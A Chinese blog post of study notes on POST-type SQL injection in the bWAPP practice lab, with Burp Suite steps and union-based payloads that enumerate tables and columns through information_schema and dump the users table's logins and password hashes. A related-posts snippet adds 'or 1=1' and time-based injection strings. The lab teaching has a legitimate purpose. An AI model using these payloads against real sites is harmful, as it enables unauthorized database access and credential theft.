sql group by和over一起使用_Web安全(二)SQL注入[二]

最新推荐文章于 2023-04-21 22:21:30 发布
最新推荐文章于 2023-04-21 22:21:30 发布
阅读量197 收藏
点赞数
文章标签: sql group by和over一起使用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39965102/article/details/111390036
版权
20d06f2db0aece4129d236cb0e29c2cd.gif

点击上方蓝字关注!

注:本篇文章为个人学习笔记仅供学习交流。

8a8802dae7f7de6e01a7691414e21475.gif

POST型SQL注入

在HTTP常用方法中,POST方法提交的信息不存储与URL,而是存储在HTTP实体内容中,在大多的提交过程,用户是无感知的。 且注入信息是存储于HTTP实体内容中而不是URL,通过改造实体内容,达到实际执行的SQL语句获取更多信息的目的。

示例

1.开启bwapp漏洞环境,如下图选择SQL injection(POST/Select),级别选择low。

63d62acf654c3399e8eb46be2acc210f.png

2.开启burpsuite,点击GO抓包。

0cdbc48b09bf25ddf327415837fcd7fb.png

f56c6d710e10fda5a6ab2b8face327d9.png

3.如下图,将抓到的指定的包发送到Repeater模块

8764aa2d2f58a609b7e4f499f323cdba.png

4.如下图,输入英文单引号测试。发现报错,说明存在注入点。

47c536f6f7ed3d65d892cfda6d79ab20.png

5.然后用order by 从order by 1开始递增,直到order by 8,发现报错,说明字段数为7。

127d9413171602661ba0ae846338adbc.png

6.用联合查询,查看哪些字段可以回显。

'' union select 1,2 3,4,5,6,7

由下图可以看出,2,3,4,5可以回显。

fb2eb95cc33a9bfe8981e3256a9bb389.png

7.查看数据库相关信息,成功回显相关信息,但回显的信息只有1条而无法获得所有表名。 
'' union select 1,database(),user(),version(),table_name,6,7 from information_schema.tables where table_schema=database()

4043ebd07d120b4d6c08bb862b4ddeae.png

8.使用group_concat()函数,回显所有表名。 
'' union select 1,database(),user(),version(),group_concat(table_name),6,7 from information_schema.tables where table_schema=database()

b6763ec8011d03ad64b80a993515ed8f.png

9.显示表的字段。 
='' union select 1,database(),user(),version(),group_concat(column_name),6,7 from information_schema.columns where table_name='users'

ece5936d562e7b0513aa48f0cd713dc9.png

10.表结构已经知道,直接查询用户名和密码。密码已加密,解密方法见Web安全(二)SQL注入[一]

='' union select 1,database(),user(),group_concat(password),group_concat(login),6,7 from users

52eb25565f181aee8f231f2aec12aca0.png

51e23248e39df5682c491c3c54851a0b.gif

- End -

9b373572dbd3a2132d9ff68e8dee045e.png 往期推荐

  • Web安全(二)SQL注入[一]

  • 全球最大的色情网站,保留着西方媒体最后的良心

  • Web安全(一)文件上传漏洞[三]

a15145fd2494987a4891ad35bf72d5c5.png觉得不错,请点个在看

weixin_39965102
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql group by和over一起使用_SQL注入笔记(一)
weixin_39695306的博客
12-06 968
“个人学习笔记(一)”SQL注入简述通过把SQL语句插入到用户输入内容、Web表单、页面请求的变量,最终被服务器执行,达到欺骗服务器执行恶意的SQL命令的攻击方法。手工注入联合查询注入不同的数据库,由于在SQL语法上的差异,SQL注入方法也由于差异。虽然每种数据库的手工注入方法有所差异,但是手工注入的思路一致。手工注入思路:1.确定是否存在注入,注入是字符型还是数字型2.确定注入点...
mysql group by over_sqlserver之group by 与over函数
weixin_27017211的博客
02-03 706
group by 函数主要用来对数据进行分组,over()函数则是一个“开窗函数”,它更多的是与聚合函数如:sum()、max()、min()、avg()、count()等函数以及排名函数如:row_number()、rank()、dense_rank()、ntile()函数结合使用。1.group by 函数原始数据如下,数据表名为hr.employeee对以上数据按照city字段进行分组,并计...
窗口函数sum() over()不支持和group by同时使用?
qq470216572的博客
09-08 2061
窗口函数sum() over()不支持和group by同时使用?
hive over()和group by配合使用
qq_41941522的博客
12-30 3210
建表: create table temp.practice( shop_id string, user_id string, amt int ) stored as orc; 插入数据 insert into temp.practice values (‘01’,‘01’,40), (‘01’,‘01’,20), (‘01’,‘02’,30), (‘02’,‘03’,100), (‘02’,‘03’,0), (‘02’,‘02’,20), (‘02’,‘01’,10), (‘03’,‘05’,50), (
sqlserver之group by 与over函数
weixin_30319153的博客
07-29 260
group by 函数主要用来对数据进行分组,over()函数则是一个“开窗函数”,它更多的是与聚合函数如:sum()、max()、min()、avg()、count()等函数以及排名函数如:row_number()、rank()、dense_rank()、ntile()函数结合使用。 1.group by 函数 原始数据如下,数据表名为hr.employeee 对以上数据按照ci...
Flink基础系列32-Table API和Flink SQL之时间窗口
04-26
例如,`input.window(Tumble.over("10.minutes").on("rowtime").as("w"))`定义了一个基于事件时间的10分钟滚动窗口,窗口别名`w`在后续的`groupBy`和`select`操作使用。 1.1.1 滚动窗口(Tumbling Windows) 滚动...
大数据之flink教程-TableAPI和SQL.pdf
07-27
1.1 什么是 Table API 和 Flink SQL 2 1.2 需要引入的依赖 2 1.3 两种 planner(old & blink)的区别 4 第章 API 调用 5 2.1 基本程序结构 5 2.2 创建表环境 5 2.3 在 Catalog 注册表 7 2.3.1 表(Table)的概念...
10家互联网大厂SQL笔试题目和答案合集_60页_0926.pdf
最新发布
08-29
可以使用`CASE`语句创建时间段,再用`GROUP BY`和`MAX`函数找出最高值。 3. **单日登录次数统计**: - 问题:单日登录次数大于等于5次的用户数? - 解答:这需要对用户每日登录事件进行计数,可以使用窗口函数`...
大数据技术sql面试题
04-23
本文档提供了三道大数据技术SQL面试题的解析,涵盖了数据的累积访问次数、店铺UV和PV统计、访客访问次数排名等方面的知识点。 知识点 1:累积访问次数 在第一题,我们需要使用 SQL 统计出每个用户的累积访问次数...
SQL SERVER 分组求和sql语句
01-19
分组后分组合计以及总计SQL语句(稍微整理了一下)MYSQL每隔10分钟进行分组统计的实现方法mysql使用GROUP BY分组实现取前N条记录的方法详解MySQL的分组查询与连接查询语句sql server如何利用开窗函数over()进行...
SQLgroup by 的用法及其与 over(partition by)的区别
打孔员的博客
04-21 1265
SQLgroup by 的用法及其与 over(partition by)的区别
SpringBoot整合Spring Data MongoDB
liulang68的博客
09-18 1455
MongoDB是主流的非关系型数据库,它也是非关系型数据库所有的产品当最像关系型数据库的。它是一个面向文档的非关系型数据库,同时它的使用也跟我们传统的关系型数据库结构是差不多的。它里面也会有数据表的概念。但是它的数据表相对来说比较灵活。 mysql数据库建表必须规定好它的多少个字段,字段的数据类型是什么。 在MongoDB里面我们不用去规定数据类型了,因为MongoDB里面的数据类型全部都是类似于json格式进行存储的,所以存储非常灵活。 SpringBoot提供了一个Spring Data MongoD
数据库 select over 方法
hujiao_jingling的专栏
02-27 8754
OVER子句   OVER子句用于为行为定义一个窗口(windows),以便进行特定的运算。可以把行的窗口简单地认为是运算将要操作的一个行的集合。例如,聚合函数和排名函数都是可以支持OVER子句的运算类型。由于OVER子句为这些函数提供了一个行的窗口,所以这些函数也称之为开窗函数。   聚合函数的要点就是要对一组值进行聚合,聚合函数传统上一直以GROUP BY查询作为操作的上下文。在前面的
sql实务与提高 in操作符 用over()分组跟group by分组的区别
u012076669的博客
06-29 1087
利用over()函数快速计算占比、join 1=1意味着什么、in操作符
mysql数据库sql优化(四)看这里之group by优化与分页查询优化
qq_39746820的博客
03-31 617
mysql数据库sql优化group by优化与分页查询优化
sql几个有趣的函数
weixin_45052608的博客
11-09 817
分组拼接函数 group_concat(拼接字段)这个函数可以按照指定分组,拼接每组指定字段的值为一个字符串。 也可以开窗使用group_concat(拼接字段) over(partition by 分组字段 order by 排序字段) select a.* ,b.time_group from dws.dws_niu_kwai_data a left join (select data_date ,brand ,people ,max(time_group) time_group
BWAPPsql注入部分详解
tianzhende_kun的博客
02-28 797
可以看到, 联合查询3的位置对应password字段, 且password字段的值是经过md5加密过的, 由于用户名和密码是分开进行判断的, 为了能够回显出报错信息, 需要注入的联合查询字段(顺序为3)与输入的密码相等。注入语句IronMan' and if (length(database())=5,sleep(5),1) --1。' union select 1,2,3,4,5,6,7,8,9,10 # 报错。尝试万能密码: 1’ or 1=1 –- 1。尝试万能密码:1' or 1=1 -- 1。
MySQL开窗函数over与group by进行olap数据分析
小y的专栏
08-22 2354
作用: 开窗函数类似于聚合函数(group by),主要实现数据的分组统计,在PostgreSQL被称为窗口函数、在Oracle被称为分析函数、在DB2被称为OLAP函数。over在某些情况下可以完全替代group by,但大多情况下,over比group by更灵活、更强大。 优点: 1)同时具有分组和排序的功能 2)不减少原表的行数,经常用来在每组内排名 3)分组排序灵活 对比group by: 1)group by 只能得到分组后的统计数据,over partition b
hive sql可以使用 group by 加 first
07-12
在 Hive SQL ,没有内置的 FIRST 函数来直接获取每个分组的第一个值。但是,你可以通过其他方法来实现类似的功能。 一种常见的方法是使用窗口函数和子查询来模拟 FIRST 函数。以下是一个示例: ```sql SELECT group_column, column1 AS first_value FROM ( SELECT group_column, column1, row_number() OVER (PARTITION BY group_column ORDER BY your_order_column) AS rn FROM your_table ) subquery WHERE rn = 1; ``` 上述代码,首先在子查询使用窗口函数 `row_number()` 给每个分组的行分配一个行号,根据指定的排序列 `your_order_column` 进行排序。然后,在外部查询选择行号为 1 的行,并将其作为每个分组的第一个值。 请注意,上述示例代码是基于 Hive 版本 0.11 以上的版本,因为窗口函数在较早的版本可能不被支持。如果你使用的是较旧的 Hive 版本,请确保你所使用的版本支持窗口函数。 另外,你还可以考虑使用 LATERAL VIEW 和 UDF(用户定义函数)来实现类似的功能。具体实现方法可能因你所使用的 Hive 版本和具体需求而有所不同。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值